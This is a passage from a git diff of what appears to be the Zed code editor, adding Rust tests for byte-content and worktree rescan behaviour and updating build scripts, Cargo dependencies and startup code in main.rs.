detected as Binary via RIFF header" + ); + } + + #[test] + fn test_le16_binary_not_misdetected_as_utf16le() { + let mut bytes = b"FAKE".to_vec(); + while bytes.len() < FILE_ANALYSIS_BYTES { + let sample = (bytes.len() & 0xFF) as u8; + bytes.push(sample); + bytes.push(0x00); + } + bytes.truncate(FILE_ANALYSIS_BYTES); + + let result = analyze_byte_content(&bytes); + assert_eq!( + result, + ByteContent::Binary, + "LE 16-bit binary with control characters should be detected as Binary" + ); + } + + #[test] + fn test_be16_binary_not_misdetected_as_utf16be() { + let mut bytes = b"FAKE".to_vec(); + while bytes.len() < FILE_ANALYSIS_BYTES { + bytes.push(0x00); + let sample = (bytes.len() & 0xFF) as u8; + bytes.push(sample); + } + bytes.truncate(FILE_ANALYSIS_BYTES); + + let result = analyze_byte_content(&bytes); + assert_eq!( + result, + ByteContent::Binary, + "BE 16-bit binary with control characters should be detected as Binary" + ); + } + + #[test] + fn test_utf16le_text_detected_as_utf16le() { + let text = "Hello, world! This is a UTF-16 test string. "; + let mut bytes = Vec::new(); + while bytes.len() < FILE_ANALYSIS_BYTES { + bytes.extend(text.encode_utf16().flat_map(|u| u.to_le_bytes())); + } + bytes.truncate(FILE_ANALYSIS_BYTES); + + assert_eq!(analyze_byte_content(&bytes), ByteContent::Utf16Le); + } + + #[test] + fn test_utf16be_text_detected_as_utf16be() { + let text = "Hello, world! This is a UTF-16 test string. 
"; + let mut bytes = Vec::new(); + while bytes.len() < FILE_ANALYSIS_BYTES { + bytes.extend(text.encode_utf16().flat_map(|u| u.to_be_bytes())); + } + bytes.truncate(FILE_ANALYSIS_BYTES); + + assert_eq!(analyze_byte_content(&bytes), ByteContent::Utf16Be); + } + + #[test] + fn test_known_binary_headers() { + let cases: &[(&[u8], &str)] = &[ + (b"RIFF\x00\x00\x00\x00WAVE", "WAV"), + (b"RIFF\x00\x00\x00\x00AVI ", "AVI"), + (b"OggS\x00\x02", "OGG"), + (b"fLaC\x00\x00", "FLAC"), + (b"ID3\x03\x00", "MP3 ID3v2"), + (b"\xFF\xFB\x90\x00", "MP3 MPEG1 Layer3"), + (b"\xFF\xF3\x90\x00", "MP3 MPEG2 Layer3"), + ]; + + for (header, label) in cases { + let mut bytes = header.to_vec(); + bytes.resize(FILE_ANALYSIS_BYTES, 0x41); // pad with 'A' + assert_eq!( + analyze_byte_content(&bytes), + ByteContent::Binary, + "{label} should be detected as Binary" + ); + } + } } diff --git a/crates/worktree/tests/integration/main.rs b/crates/worktree/tests/integration/main.rs index 803a7e4e6c893e29466e3e6002b3efbdc5574859..b8d1994b1dc3f8ddbd482dd0863e3441ab7adc64 100644 --- a/crates/worktree/tests/integration/main.rs +++ b/crates/worktree/tests/integration/main.rs @@ -14,10 +14,12 @@ use worktree::{Entry, EntryKind, Event, PathChange, Worktree, WorktreeModelHandl use serde_json::json; use settings::{SettingsStore, WorktreeId}; use std::{ + cell::Cell, env, fmt::Write, mem, path::{Path, PathBuf}, + rc::Rc, sync::Arc, }; use util::{ @@ -409,6 +411,164 @@ async fn test_renaming_case_only(cx: &mut TestAppContext) { }); } +#[gpui::test] +async fn test_root_rescan_reconciles_stale_state(cx: &mut TestAppContext) { + init_test(cx); + let fs = FakeFs::new(cx.background_executor.clone()); + fs.insert_tree( + "/root", + json!({ + "old.txt": "", + }), + ) + .await; + + let tree = Worktree::local( + Path::new("/root"), + true, + fs.clone(), + Default::default(), + true, + WorktreeId::from_proto(0), + &mut cx.to_async(), + ) + .await + .unwrap(); + + cx.read(|cx| 
tree.read(cx).as_local().unwrap().scan_complete()) + .await; + + tree.read_with(cx, |tree, _| { + assert_eq!( + tree.entries(true, 0) + .map(|entry| entry.path.as_ref()) + .collect::>(), + vec![rel_path(""), rel_path("old.txt")] + ); + }); + + fs.pause_events(); + fs.remove_file(Path::new("/root/old.txt"), RemoveOptions::default()) + .await + .unwrap(); + fs.insert_file(Path::new("/root/new.txt"), Vec::new()).await; + assert_eq!(fs.buffered_event_count(), 2); + fs.clear_buffered_events(); + + tree.read_with(cx, |tree, _| { + assert!(tree.entry_for_path(rel_path("old.txt")).is_some()); + assert!(tree.entry_for_path(rel_path("new.txt")).is_none()); + }); + + fs.emit_fs_event("/root", Some(fs::PathEventKind::Rescan)); + fs.unpause_events_and_flush(); + tree.flush_fs_events(cx).await; + + tree.read_with(cx, |tree, _| { + assert!(tree.entry_for_path(rel_path("old.txt")).is_none()); + assert!(tree.entry_for_path(rel_path("new.txt")).is_some()); + assert_eq!( + tree.entries(true, 0) + .map(|entry| entry.path.as_ref()) + .collect::>(), + vec![rel_path(""), rel_path("new.txt")] + ); + }); +} + +#[gpui::test] +async fn test_subtree_rescan_reports_unchanged_descendants_as_updated(cx: &mut TestAppContext) { + init_test(cx); + let fs = FakeFs::new(cx.background_executor.clone()); + fs.insert_tree( + "/root", + json!({ + "dir": { + "child.txt": "", + "nested": { + "grandchild.txt": "", + }, + "remove": { + "removed.txt": "", + } + }, + "other.txt": "", + }), + ) + .await; + + let tree = Worktree::local( + Path::new("/root"), + true, + fs.clone(), + Default::default(), + true, + WorktreeId::from_proto(0), + &mut cx.to_async(), + ) + .await + .unwrap(); + + cx.read(|cx| tree.read(cx).as_local().unwrap().scan_complete()) + .await; + + let tree_updates = Arc::new(Mutex::new(Vec::new())); + tree.update(cx, |_, cx| { + let tree_updates = tree_updates.clone(); + cx.subscribe(&tree, move |_, _, event, _| { + if let Event::UpdatedEntries(update) = event { + tree_updates.lock().extend( + 
update + .iter() + .filter(|(path, _, _)| path.as_ref() != rel_path("fs-event-sentinel")) + .map(|(path, _, change)| (path.clone(), *change)), + ); + } + }) + .detach(); + }); + fs.pause_events(); + fs.insert_file("/root/dir/new.txt", b"new content".to_vec()) + .await; + fs.remove_dir( + "/root/dir/remove".as_ref(), + RemoveOptions { + recursive: true, + ignore_if_not_exists: false, + }, + ) + .await + .unwrap(); + fs.clear_buffered_events(); + fs.unpause_events_and_flush(); + + fs.emit_fs_event("/root/dir", Some(fs::PathEventKind::Rescan)); + tree.flush_fs_events(cx).await; + + assert_eq!( + mem::take(&mut *tree_updates.lock()), + &[ + (rel_path("dir").into(), PathChange::Updated), + (rel_path("dir/child.txt").into(), PathChange::Updated), + (rel_path("dir/nested").into(), PathChange::Updated), + ( + rel_path("dir/nested/grandchild.txt").into(), + PathChange::Updated + ), + (rel_path("dir/new.txt").into(), PathChange::Added), + (rel_path("dir/remove").into(), PathChange::Removed), + ( + rel_path("dir/remove/removed.txt").into(), + PathChange::Removed + ), + ] + ); + + tree.read_with(cx, |tree, _| { + assert!(tree.entry_for_path(rel_path("other.txt")).is_some()); + }); +} + #[gpui::test] async fn test_open_gitignored_files(cx: &mut TestAppContext) { init_test(cx); @@ -2576,6 +2736,97 @@ fn check_worktree_entries( } } +#[gpui::test] +async fn test_root_repo_common_dir(executor: BackgroundExecutor, cx: &mut TestAppContext) { + init_test(cx); + + use git::repository::Worktree as GitWorktree; + + let fs = FakeFs::new(executor); + + // Set up a main repo and a linked worktree pointing back to it. 
+ fs.insert_tree( + path!("/main_repo"), + json!({ + ".git": {}, + "file.txt": "content", + }), + ) + .await; + fs.add_linked_worktree_for_repo( + Path::new(path!("/main_repo/.git")), + false, + GitWorktree { + path: PathBuf::from(path!("/linked_worktree")), + ref_name: Some("refs/heads/feature".into()), + sha: "abc123".into(), + is_main: false, + }, + ) + .await; + fs.write( + path!("/linked_worktree/file.txt").as_ref(), + "content".as_bytes(), + ) + .await + .unwrap(); + + let tree = Worktree::local( + path!("/linked_worktree").as_ref(), + true, + fs.clone(), + Arc::default(), + true, + WorktreeId::from_proto(0), + &mut cx.to_async(), + ) + .await + .unwrap(); + tree.update(cx, |tree, _| tree.as_local().unwrap().scan_complete()) + .await; + cx.run_until_parked(); + + // For a linked worktree, root_repo_common_dir should point to the + // main repo's .git, not the worktree-specific git directory. + tree.read_with(cx, |tree, _| { + assert_eq!( + tree.snapshot().root_repo_common_dir().map(|p| p.as_ref()), + Some(Path::new(path!("/main_repo/.git"))), + ); + }); + + let event_count: Rc> = Rc::new(Cell::new(0)); + tree.update(cx, { + let event_count = event_count.clone(); + |_, cx| { + cx.subscribe(&cx.entity(), move |_, _, event, _| { + if matches!(event, Event::UpdatedRootRepoCommonDir) { + event_count.set(event_count.get() + 1); + } + }) + .detach(); + } + }); + + // Remove .git — root_repo_common_dir should become None. 
+ fs.remove_file( + &PathBuf::from(path!("/linked_worktree/.git")), + Default::default(), + ) + .await + .unwrap(); + tree.flush_fs_events(cx).await; + + tree.read_with(cx, |tree, _| { + assert_eq!(tree.snapshot().root_repo_common_dir(), None); + }); + assert_eq!( + event_count.get(), + 1, + "should have emitted UpdatedRootRepoCommonDir on removal" + ); +} + fn init_test(cx: &mut gpui::TestAppContext) { zlog::init_test(); @@ -2947,3 +3198,67 @@ async fn test_refresh_entries_for_paths_creates_ancestors(cx: &mut TestAppContex ); }); } + +#[gpui::test] +async fn test_single_file_worktree_deleted(cx: &mut TestAppContext) { + init_test(cx); + let fs = FakeFs::new(cx.background_executor.clone()); + + fs.insert_tree( + "/root", + json!({ + "test.txt": "content", + }), + ) + .await; + + let tree = Worktree::local( + Path::new("/root/test.txt"), + true, + fs.clone(), + Default::default(), + true, + WorktreeId::from_proto(0), + &mut cx.to_async(), + ) + .await + .unwrap(); + + cx.read(|cx| tree.read(cx).as_local().unwrap().scan_complete()) + .await; + + tree.read_with(cx, |tree, _| { + assert!(tree.is_single_file(), "Should be a single-file worktree"); + assert_eq!(tree.abs_path().as_ref(), Path::new("/root/test.txt")); + }); + + // Delete the file + fs.remove_file(Path::new("/root/test.txt"), Default::default()) + .await + .unwrap(); + + // Subscribe to worktree events + let deleted_event_received = Rc::new(Cell::new(false)); + let _subscription = cx.update({ + let deleted_event_received = deleted_event_received.clone(); + |cx| { + cx.subscribe(&tree, move |_, event, _| { + if matches!(event, Event::Deleted) { + deleted_event_received.set(true); + } + }) + } + }); + + // Trigger filesystem events - the scanner should detect the file is gone immediately + // and emit a Deleted event + cx.background_executor.run_until_parked(); + cx.background_executor + .advance_clock(std::time::Duration::from_secs(1)); + cx.background_executor.run_until_parked(); + + assert!( + 
deleted_event_received.get(), + "Should receive Deleted event when single-file worktree root is deleted" + ); +} diff --git a/crates/x_ai/src/x_ai.rs b/crates/x_ai/src/x_ai.rs index 072a893a6a8f4fc7fbc8a6f4f5ed43316915b974..1abb2b53771fa1e29e2979560e9f394744b26158 100644 --- a/crates/x_ai/src/x_ai.rs +++ b/crates/x_ai/src/x_ai.rs @@ -165,6 +165,18 @@ impl Model { } } + pub fn requires_json_schema_subset(&self) -> bool { + match self { + Self::Grok4 + | Self::Grok4FastReasoning + | Self::Grok4FastNonReasoning + | Self::Grok41FastNonReasoning + | Self::Grok41FastReasoning + | Self::GrokCodeFast1 => true, + _ => false, + } + } + pub fn supports_prompt_cache_key(&self) -> bool { false } diff --git a/crates/zed/Cargo.toml b/crates/zed/Cargo.toml index 82b730ee8f1b50f6f46a7400be908a9442e115d1..9feaa59c9762208e4e4e85748f21a7a3e0afc3db 100644 --- a/crates/zed/Cargo.toml +++ b/crates/zed/Cargo.toml @@ -2,7 +2,7 @@ description = "The fast, collaborative code editor." edition.workspace = true name = "zed" -version = "0.227.0" +version = "0.232.0" publish.workspace = true license = "GPL-3.0-or-later" authors = ["Zed Team "] @@ -13,11 +13,12 @@ workspace = true [features] tracy = ["ztracing/tracy"] +# LEAK_BACKTRACE=1 cargo run --features zed/track-project-leak --profile release-fast +track-project-leak = ["gpui/leak-detection"] test-support = [ "gpui/test-support", "gpui_platform/screen-capture", "dep:image", - "dep:semver", "workspace/test-support", "project/test-support", "editor/test-support", @@ -32,7 +33,6 @@ visual-tests = [ "gpui_platform/screen-capture", "gpui_platform/test-support", "dep:image", - "dep:semver", "dep:tempfile", "dep:action_log", "dep:agent_servers", @@ -50,7 +50,6 @@ visual-tests = [ "language_model/test-support", "fs/test-support", "recent_projects/test-support", - "sidebar/test-support", "title_bar/test-support", ] @@ -69,14 +68,13 @@ activity_indicator.workspace = true agent.workspace = true agent-client-protocol.workspace = true 
agent_settings.workspace = true -agent_ui.workspace = true +agent_ui = { workspace = true, features = ["audio"] } anyhow.workspace = true askpass.workspace = true assets.workspace = true audio.workspace = true auto_update.workspace = true auto_update_ui.workspace = true -bincode.workspace = true breadcrumbs.workspace = true call.workspace = true chrono.workspace = true @@ -94,6 +92,7 @@ copilot.workspace = true copilot_chat.workspace = true copilot_ui.workspace = true crashes.workspace = true +csv_preview.workspace = true dap_adapters.workspace = true db.workspace = true debug_adapter_extension.workspace = true @@ -121,7 +120,7 @@ system_specs.workspace = true gpui.workspace = true gpui_platform = {workspace = true, features=["screen-capture", "font-kit", "wayland", "x11"]} image = { workspace = true, optional = true } -semver = { workspace = true, optional = true } +semver.workspace = true tempfile = { workspace = true, optional = true } clock = { workspace = true, optional = true } acp_thread.workspace = true @@ -189,7 +188,6 @@ sidebar.workspace = true smol.workspace = true snippet_provider.workspace = true snippets_ui.workspace = true -supermaven.workspace = true svg_preview.workspace = true sysinfo.workspace = true tab_switcher.workspace = true @@ -199,6 +197,7 @@ telemetry.workspace = true telemetry_events.workspace = true terminal_view.workspace = true theme.workspace = true +theme_settings.workspace = true theme_extension.workspace = true theme_selector.workspace = true time.workspace = true @@ -242,9 +241,11 @@ gpui = { workspace = true, features = [ ] } ashpd.workspace = true +[target.'cfg(target_os = "linux")'.build-dependencies] +pkg-config = "0.3.22" + [dev-dependencies] call = { workspace = true, features = ["test-support"] } -dap = { workspace = true, features = ["test-support"] } editor = { workspace = true, features = ["test-support"] } gpui = { workspace = true, features = ["test-support"] } image_viewer = { workspace = true, features = 
["test-support"] } @@ -254,8 +255,6 @@ pretty_assertions.workspace = true project = { workspace = true, features = ["test-support"] } semver.workspace = true terminal_view = { workspace = true, features = ["test-support"] } -tree-sitter-md.workspace = true -tree-sitter-rust.workspace = true title_bar = { workspace = true, features = ["test-support"] } workspace = { workspace = true, features = ["test-support"] } image.workspace = true diff --git a/crates/zed/build.rs b/crates/zed/build.rs index 7e22752d35d9115efd735bfc7b2690f4bf5680d3..4b27d939aee833058d03771907b53324a6ce50d0 100644 --- a/crates/zed/build.rs +++ b/crates/zed/build.rs @@ -2,6 +2,27 @@ use std::process::Command; fn main() { + #[cfg(target_os = "linux")] + { + // Add rpaths for libraries that webrtc-sys dlopens at runtime. + // This is mostly required for hosts with non-standard SO installation + // locations such as NixOS. + let dlopened_libs = ["libva", "libva-drm", "egl"]; + + let mut rpath_dirs = std::collections::BTreeSet::new(); + for lib in &dlopened_libs { + if let Some(libdir) = pkg_config::get_variable(lib, "libdir").ok() { + rpath_dirs.insert(libdir); + } else { + eprintln!("zed build.rs: {lib} not found in pkg-config's path"); + } + } + + for dir in &rpath_dirs { + println!("cargo:rustc-link-arg=-Wl,-rpath,{dir}"); + } + } + if cfg!(target_os = "macos") { println!("cargo:rustc-env=MACOSX_DEPLOYMENT_TARGET=10.15.7"); @@ -24,12 +45,28 @@ fn main() { "cargo:rustc-env=TARGET={}", std::env::var("TARGET").unwrap() ); - if let Ok(output) = Command::new("git").args(["rev-parse", "HEAD"]).output() - && output.status.success() - { - let git_sha = String::from_utf8_lossy(&output.stdout); - let git_sha = git_sha.trim(); + let git_sha = match std::env::var("ZED_COMMIT_SHA").ok() { + Some(git_sha) => { + // In deterministic build environments such as Nix, we inject the commit sha into the build script. 
+ Some(git_sha) + } + None => { + if let Some(output) = Command::new("git") + .args(["rev-parse", "HEAD"]) + .output() + .ok() + && output.status.success() + { + let git_sha = String::from_utf8_lossy(&output.stdout); + Some(git_sha.trim().to_string()) + } else { + None + } + } + }; + + if let Some(git_sha) = git_sha { println!("cargo:rustc-env=ZED_COMMIT_SHA={git_sha}"); if let Some(build_identifier) = option_env!("GITHUB_RUN_NUMBER") { @@ -45,10 +82,8 @@ fn main() { } } - #[cfg(target_os = "windows")] - { - #[cfg(target_env = "msvc")] - { + if cfg!(windows) { + if cfg!(target_env = "msvc") { // todo(windows): This is to avoid stack overflow. Remove it when solved. println!("cargo:rustc-link-arg=/stack:{}", 8 * 1024 * 1024); } @@ -65,7 +100,7 @@ fn main() { let conpty_dll_target = target_dir.join("conpty.dll"); let open_console_target = target_dir.join("OpenConsole.exe"); - let conpty_url = "https://github.com/microsoft/terminal/releases/download/v1.23.13503.0/Microsoft.Windows.Console.ConPTY.1.23.251216003.nupkg"; + let conpty_url = "https://github.com/microsoft/terminal/releases/download/v1.24.10621.0/Microsoft.Windows.Console.ConPTY.1.24.260303001.nupkg"; let nupkg_path = out_dir.join("conpty.nupkg.zip"); let extract_dir = out_dir.join("conpty"); @@ -180,21 +215,24 @@ fn main() { println!("cargo:rerun-if-env-changed=RELEASE_CHANNEL"); println!("cargo:rerun-if-changed={}", icon.display()); - let mut res = winresource::WindowsResource::new(); + #[cfg(windows)] + { + let mut res = winresource::WindowsResource::new(); - // Depending on the security applied to the computer, winresource might fail - // fetching the RC path. Therefore, we add a way to explicitly specify the - // toolkit path, allowing winresource to use a valid RC path. 
- if let Some(explicit_rc_toolkit_path) = std::env::var("ZED_RC_TOOLKIT_PATH").ok() { - res.set_toolkit_path(explicit_rc_toolkit_path.as_str()); - } - res.set_icon(icon.to_str().unwrap()); - res.set("FileDescription", "Zed"); - res.set("ProductName", "Zed"); + // Depending on the security applied to the computer, winresource might fail + // fetching the RC path. Therefore, we add a way to explicitly specify the + // toolkit path, allowing winresource to use a valid RC path. + if let Some(explicit_rc_toolkit_path) = std::env::var("ZED_RC_TOOLKIT_PATH").ok() { + res.set_toolkit_path(explicit_rc_toolkit_path.as_str()); + } + res.set_icon(icon.to_str().unwrap()); + res.set("FileDescription", "Zed"); + res.set("ProductName", "Zed"); - if let Err(e) = res.compile() { - eprintln!("{}", e); - std::process::exit(1); + if let Err(e) = res.compile() { + eprintln!("{}", e); + std::process::exit(1); + } } } } diff --git a/crates/zed/src/main.rs b/crates/zed/src/main.rs index f429c32df79b6a1a62a82832e69d412800544e8a..5937b91665b892084aa7b4d1f8b94ec1e2d864da 100644 --- a/crates/zed/src/main.rs +++ b/crates/zed/src/main.rs @@ -10,11 +10,11 @@ use agent_ui::AgentPanel; use anyhow::{Context as _, Error, Result}; use clap::Parser; use cli::FORCE_CLI_MODE_ENV_VAR_NAME; -use client::{Client, ProxySettings, UserStore, parse_zed_link}; +use client::{Client, ProxySettings, RefreshLlmTokenListener, UserStore, parse_zed_link}; use collab_ui::channel_view::ChannelView; use collections::HashMap; use crashes::InitCrashHandler; -use db::kvp::{GLOBAL_KEY_VALUE_STORE, KEY_VALUE_STORE}; +use db::kvp::{GlobalKeyValueStore, KeyValueStore}; use editor::Editor; use extension::ExtensionHostProxy; use fs::{Fs, RealFs}; @@ -48,10 +48,11 @@ use std::{ path::{Path, PathBuf}, process, rc::Rc, - sync::{Arc, OnceLock}, + sync::{Arc, LazyLock, OnceLock}, time::Instant, }; use theme::{ActiveTheme, GlobalTheme, ThemeRegistry}; +use theme_settings::load_user_theme; use util::{ResultExt, TryFutureExt, maybe}; use 
uuid::Uuid; use workspace::{ @@ -325,17 +326,27 @@ fn main() { let app = Application::with_platform(gpui_platform::current_platform(false)).with_assets(Assets); + let app_db = db::AppDatabase::new(); let system_id = app.background_executor().spawn(system_id()); - let installation_id = app.background_executor().spawn(installation_id()); - let session_id = Uuid::new_v4().to_string(); - let session = app + let installation_id = app .background_executor() - .spawn(Session::new(session_id.clone())); + .spawn(installation_id(KeyValueStore::from_app_db(&app_db))); + let session_id = Uuid::new_v4().to_string(); + let session = app.background_executor().spawn(Session::new( + session_id.clone(), + KeyValueStore::from_app_db(&app_db), + )); crashes::init( InitCrashHandler { session_id, - zed_version: app_version.to_string(), + // strip the build and channel information from the version string, we send them separately + zed_version: semver::Version::new( + app_version.major, + app_version.minor, + app_version.patch, + ) + .to_string(), binary: "zed".to_string(), release_channel: release_channel::RELEASE_CHANNEL_NAME.clone(), commit_sha: app_commit_sha @@ -430,10 +441,8 @@ fn main() { } }); app.on_reopen(move |cx| { - if let Some(app_state) = AppState::try_global(cx).and_then(|app_state| app_state.upgrade()) - { + if let Some(app_state) = AppState::try_global(cx) { cx.spawn({ - let app_state = app_state; async move |cx| { if let Err(e) = restore_or_create_workspace(app_state, cx).await { fail_to_open_window_async(e, cx) @@ -445,7 +454,8 @@ fn main() { }); app.run(move |cx| { - let db_trusted_paths = match workspace::WORKSPACE_DB.fetch_trusted_worktrees() { + cx.set_global(app_db); + let db_trusted_paths = match workspace::WorkspaceDb::global(cx).fetch_trusted_worktrees() { Ok(trusted_paths) => trusted_paths, Err(e) => { log::error!("Failed to do initial trusted worktrees fetch: {e:#}"); @@ -527,6 +537,7 @@ fn main() { tx.send(Some(options)).log_err(); }) .detach(); + 
ui::on_new_scrollbars::(cx); let node_runtime = NodeRuntime::new(client.http_client(), Some(shell_env_loaded_rx), rx); @@ -573,6 +584,21 @@ fn main() { session.id().to_owned(), cx, ); + cx.subscribe(&user_store, { + let telemetry = telemetry.clone(); + move |_, evt: &client::user::Event, _| match evt { + client::user::Event::PrivateUserInfoUpdated => { + crashes::set_user_info(crashes::UserInfo { + metrics_id: telemetry.metrics_id().map(|s| s.to_string()), + is_staff: telemetry.is_staff(), + }); + } + _ => {} + } + }) + .detach(); + + let is_new_install = matches!(&installation_id, Some(IdType::New(_))); // We should rename these in the future to `first app open`, `first app open for release channel`, and `app open` if let (Some(system_id), Some(installation_id)) = (&system_id, &installation_id) { @@ -601,7 +627,7 @@ fn main() { node_runtime, session: app_session, }); - AppState::set_global(Arc::downgrade(&app_state), cx); + AppState::set_global(app_state.clone(), cx); auto_update::init(client.clone(), cx); dap_adapters::init(cx); @@ -615,7 +641,7 @@ fn main() { cx, ); - theme::init(theme::LoadThemes::All(Box::new(Assets)), cx); + theme_settings::init(theme::LoadThemes::All(Box::new(Assets)), cx); eager_load_active_theme_and_icon_theme(fs.clone(), cx); theme_extension::init( extension_host_proxy, @@ -638,15 +664,19 @@ fn main() { ); copilot_ui::init(&app_state, cx); - supermaven::init(app_state.client.clone(), cx); - language_model::init(app_state.client.clone(), cx); + language_model::init(cx); + RefreshLlmTokenListener::register( + app_state.client.clone(), + app_state.user_store.clone(), + cx, + ); language_models::init(app_state.user_store.clone(), app_state.client.clone(), cx); acp_tools::init(cx); zed::telemetry_log::init(cx); zed::remote_debug::init(cx); edit_prediction_ui::init(cx); web_search::init(cx); - web_search_providers::init(app_state.client.clone(), cx); + web_search_providers::init(app_state.client.clone(), app_state.user_store.clone(), cx); 
snippet_provider::init(cx); edit_prediction_registry::init(app_state.client.clone(), app_state.user_store.clone(), cx); let prompt_builder = PromptBuilder::load(app_state.fs.clone(), stdout_is_a_pty(), cx); @@ -657,9 +687,9 @@ fn main() { ); agent_ui::init( app_state.fs.clone(), - app_state.client.clone(), - prompt_builder.clone(), + prompt_builder, app_state.languages.clone(), + is_new_install, false, cx, ); @@ -716,6 +746,7 @@ fn main() { git_graph::init(cx); feedback::init(cx); markdown_preview::init(cx); + csv_preview::init(cx); svg_preview::init(cx); onboarding::init(cx); settings_ui::init(cx); @@ -787,11 +818,12 @@ fn main() { let fs = app_state.fs.clone(); load_user_themes_in_background(fs.clone(), cx); watch_themes(fs.clone(), cx); + #[cfg(debug_assertions)] watch_languages(fs.clone(), app_state.languages.clone(), cx); let menus = app_menus(cx); cx.set_menus(menus); - initialize_workspace(app_state.clone(), prompt_builder, cx); + initialize_workspace(app_state.clone(), cx); cx.activate(true); @@ -830,13 +862,13 @@ fn main() { diff_paths, wsl, diff_all: diff_all_mode, + dev_container: args.dev_container, }) } match open_rx - .try_next() + .try_recv() .ok() - .flatten() .and_then(|request| OpenRequest::parse(request, cx).log_err()) { Some(request) => { @@ -895,7 +927,9 @@ fn handle_open_request(request: OpenRequest, app_state: Arc, cx: &mut }) .detach_and_log_err(cx); } - OpenRequestKind::AgentPanel { initial_prompt } => { + OpenRequestKind::AgentPanel { + external_source_prompt, + } => { cx.spawn(async move |cx| { let multi_workspace = workspace::get_any_active_multi_workspace(app_state, cx.clone()).await?; @@ -904,7 +938,11 @@ fn handle_open_request(request: OpenRequest, app_state: Arc, cx: &mut multi_workspace.workspace().update(cx, |workspace, cx| { if let Some(panel) = workspace.focus_panel::(window, cx) { panel.update(cx, |panel, cx| { - panel.new_external_thread_with_text(initial_prompt, window, cx); + 
panel.new_agent_thread_with_external_source_prompt( + external_source_prompt, + window, + cx, + ); }); } }); @@ -960,21 +998,19 @@ fn handle_open_request(request: OpenRequest, app_state: Arc, cx: &mut }) .await?; - let thread_metadata = acp_thread::AgentSessionInfo { - session_id, - cwd: None, - title: Some(format!("🔗 {}", response.title).into()), - updated_at: Some(chrono::Utc::now()), - meta: None, - }; - let sharer_username = response.sharer_username.clone(); multi_workspace.update(cx, |_, window, cx| { workspace.update(cx, |workspace, cx| { if let Some(panel) = workspace.panel::(cx) { panel.update(cx, |panel, cx| { - panel.open_thread(thread_metadata, window, cx); + panel.open_thread( + session_id, + None, + Some(format!("🔗 {}", response.title).into()), + window, + cx, + ); }); panel.focus_handle(cx).focus(window, cx); } @@ -1177,6 +1213,7 @@ fn handle_open_request(request: OpenRequest, app_state: Arc, cx: &mut } let mut task = None; + let dev_container = request.dev_container; if !request.open_paths.is_empty() || !request.diff_paths.is_empty() { let app_state = app_state.clone(); task = Some(cx.spawn(async move |cx| { @@ -1187,7 +1224,10 @@ fn handle_open_request(request: OpenRequest, app_state: Arc, cx: &mut &request.diff_paths, request.diff_all, app_state, - workspace::OpenOptions::default(), + workspace::OpenOptions { + open_in_dev_container: dev_container, + ..Default::default() + }, cx, ) .await?; @@ -1277,42 +1317,37 @@ async fn authenticate(client: Arc, cx: &AsyncApp) -> Result<()> { async fn system_id() -> Result { let key_name = "system_id".to_string(); + let db = GlobalKeyValueStore::global(); - if let Ok(Some(system_id)) = GLOBAL_KEY_VALUE_STORE.read_kvp(&key_name) { + if let Ok(Some(system_id)) = db.read_kvp(&key_name) { return Ok(IdType::Existing(system_id)); } let system_id = Uuid::new_v4().to_string(); - GLOBAL_KEY_VALUE_STORE - .write_kvp(key_name, system_id.clone()) - .await?; + db.write_kvp(key_name, system_id.clone()).await?; 
Ok(IdType::New(system_id)) } -async fn installation_id() -> Result { +async fn installation_id(db: KeyValueStore) -> Result { let legacy_key_name = "device_id".to_string(); let key_name = "installation_id".to_string(); // Migrate legacy key to new key - if let Ok(Some(installation_id)) = KEY_VALUE_STORE.read_kvp(&legacy_key_name) { - KEY_VALUE_STORE - .write_kvp(key_name, installation_id.clone()) - .await?; - KEY_VALUE_STORE.delete_kvp(legacy_key_name).await?; + if let Ok(Some(installation_id)) = db.read_kvp(&legacy_key_name) { + db.write_kvp(key_name, installation_id.clone()).await?; + db.delete_kvp(legacy_key_name).await?; return Ok(IdType::Existing(installation_id)); } - if let Ok(Some(installation_id)) = KEY_VALUE_STORE.read_kvp(&key_name) { + if let Ok(Some(installation_id)) = db.read_kvp(&key_name) { return Ok(IdType::Existing(installation_id)); } let installation_id = Uuid::new_v4().to_string(); - KEY_VALUE_STORE - .write_kvp(key_name, installation_id.clone()) - .await?; + db.write_kvp(key_name, installation_id.clone()).await?; Ok(IdType::New(installation_id)) } @@ -1321,22 +1356,17 @@ pub(crate) async fn restore_or_create_workspace( app_state: Arc, cx: &mut AsyncApp, ) -> Result<()> { + let kvp = cx.update(|cx| KeyValueStore::global(cx)); if let Some((multi_workspaces, remote_workspaces)) = restorable_workspaces(cx, &app_state).await { let mut results: Vec> = Vec::new(); let mut tasks = Vec::new(); for multi_workspace in multi_workspaces { - match restore_multiworkspace(multi_workspace, app_state.clone(), cx).await { - Ok(result) => { - for error in result.errors { - log::error!("Failed to restore workspace in group: {error:#}"); - results.push(Err(error)); - } - } - Err(e) => { - results.push(Err(e)); - } + if let Err(error) = restore_multiworkspace(multi_workspace, app_state.clone(), cx).await + { + log::error!("Failed to restore workspace: {error:#}"); + results.push(Err(error)); } } @@ -1398,7 +1428,7 @@ pub(crate) async fn restore_or_create_workspace( 
.update(cx, |multi_workspace, _, cx| { multi_workspace.workspace().update(cx, |workspace, cx| { workspace.show_toast( - Toast::new(NotificationId::unique::<()>(), message), + Toast::new(NotificationId::unique::<()>(), message.clone()), cx, ) }); @@ -1410,14 +1440,26 @@ pub(crate) async fn restore_or_create_workspace( }); // If we couldn't show a toast (no windows opened successfully), - // we've already logged the errors above, so the user can check logs + // open a fallback empty workspace and show the error there if !toast_shown { - log::error!( - "Failed to show notification for window restoration errors, because no workspace windows were available." - ); + log::error!("All workspace restorations failed. Opening fallback empty workspace."); + cx.update(|cx| { + workspace::open_new( + Default::default(), + app_state.clone(), + cx, + |workspace, _window, cx| { + workspace.show_toast( + Toast::new(NotificationId::unique::<()>(), message), + cx, + ); + }, + ) + }) + .await?; } } - } else if matches!(KEY_VALUE_STORE.read_kvp(FIRST_OPEN), Ok(None)) { + } else if matches!(kvp.read_kvp(FIRST_OPEN), Ok(None)) { cx.update(|cx| show_onboarding_view(app_state, cx)).await?; } else { cx.update(|cx| { @@ -1453,7 +1495,8 @@ async fn restorable_workspaces( let (remote_workspaces, local_workspaces) = locations .into_iter() .partition(|sw| matches!(sw.location, SerializedWorkspaceLocation::Remote(_))); - let multi_workspaces = workspace::read_serialized_multi_workspaces(local_workspaces); + let multi_workspaces = + cx.update(|cx| workspace::read_serialized_multi_workspaces(local_workspaces, cx)); Some((multi_workspaces, remote_workspaces)) } @@ -1461,7 +1504,12 @@ pub(crate) async fn restorable_workspace_locations( cx: &mut AsyncApp, app_state: &Arc, ) -> Option> { - let mut restore_behavior = cx.update(|cx| WorkspaceSettings::get(None, cx).restore_on_startup); + let (mut restore_behavior, db) = 